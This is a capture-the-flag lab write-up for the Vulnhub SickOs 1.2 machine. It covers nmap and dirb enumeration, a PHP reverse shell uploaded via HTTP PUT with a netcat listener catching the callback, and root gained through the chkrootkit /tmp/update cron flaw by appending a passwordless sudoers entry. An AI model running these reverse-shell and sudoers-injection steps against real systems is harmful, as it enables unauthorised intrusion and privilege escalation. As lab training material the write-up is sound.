Vulnhub - SickOs 1.2 Writeup
Description
Vulnhub - VulnOS 2., This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
Enumeration
As usual, start off with an nmap scan.
Nmap
Nmap scan report for sickos.com (192.168.1.4)
Host is up, received arp-response (0.00049s latency).
Scanned at 2020-04-04 11:21:38 EDT for 11s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
80/tcp open http syn-ack ttl 64 lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:40:C1:F5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 4 11:21:49 2020 -- 1 IP address (1 host up) scanned in 11.89 seconds
kali@kali:~/Desktop/tools/autorecon/results/sickos.com/scans$
We are greeted with an image on opening the web application.
Dirb
Let’s see if any directories can be enumerated.
kali@kali:/$ dirb http://sickos.com
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Apr 6 03:33:09 2020
URL_BASE: http://sickos.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://sickos.com/ ----
+ http://sickos.com/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://sickos.com/test/
-----------------
END_TIME: Mon Apr 6 03:34:19 2020
DOWNLOADED: 4612 - FOUND: 1
Opening the directory gives us nothing other than the version number of lighttpd
Low shell
Turns out, we can add any document to \test directory using PUT. We can upload a reverse shell and access it to get a shell.
I used the php-reverse-shell available in kali. Change the ip and port and upload it using curl
kali@kali:~/Desktop/vulnhub/sickos$ curl -T php-reverse-shell.php http://sickos.com/test/revshell.php --http1.0
kali@kali:~/Desktop/vulnhub/sickos$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.239.3] from sickos.com [192.168.239.4] 48633
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
14:35:03 up 3:52, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
There was something peculiar that I noticed while trying to get a reverse shell. Due to some reason, the reverse shells were not connecting to any higher ports. I guess there is some kind of firewall that is blocking the requests. Very few ports such as 80, 22, 8080 seems to be working.
Low Shell Enum
Cronjob
$ ls -la /etc/cron.daily
total 72
drwxr-xr-x 2 root root 4096 Apr 12 2016 .
drwxr-xr-x 84 root root 4096 Apr 5 10:42 ..
-rw-r--r-- 1 root root 102 Jun 19 2012 .placeholder
-rwxr-xr-x 1 root root 15399 Nov 15 2013 apt
-rwxr-xr-x 1 root root 314 Apr 18 2013 aptitude
-rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
-rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
-rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
-rwxr-xr-x 1 root root 338 Dec 20 2011 lighttpd
-rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate
-rwxr-xr-x 1 root root 1365 Dec 28 2012 man-db
-rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
-rwxr-xr-x 1 root root 249 Sep 12 2012 passwd
-rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest
-rwxr-xr-x 1 root root 2947 Jun 19 2012 standard
We have few cronjobs in cron.daily. There is a exploit for chkrootkit. The exploit is that, the cronjob will execute the contents of /tmp/update. The cronjob is run as root so we can execute commands as root. The best option we be to add www-data to sudoers list to gain root.
Root Shell
- Add command into
/tmp/updateto includewww-dataas sudoer. We can addwww-dataas a sudoers without password. - Wait for the cronjob to run
- And we are root!
$ echo "echo 'www-data ALL=(ALL) NOPASSWD: ALL'>>/etc/sudoers" > /tmp/update
$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
chkrootkit-0.49
newRule
yes
cat 7*
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.
Afterthoughts
We can check the iptables to see why we were having difficulty in getting a reverse shell.
iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT tcp -- anywhere anywhere tcp spt:http-alt
ACCEPT tcp -- anywhere anywhere tcp spt:https
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp spt:ssh
ACCEPT tcp -- anywhere anywhere tcp spt:http
ACCEPT tcp -- anywhere anywhere tcp dpt:http-alt
ACCEPT tcp -- anywhere anywhere tcp dpt:https
Only ports 22, 80, 443, 8080 are allowed via firewall. This part was really unexpected and I wasted a ton of time trying to figure out what the heck was wrong with the network configuration.
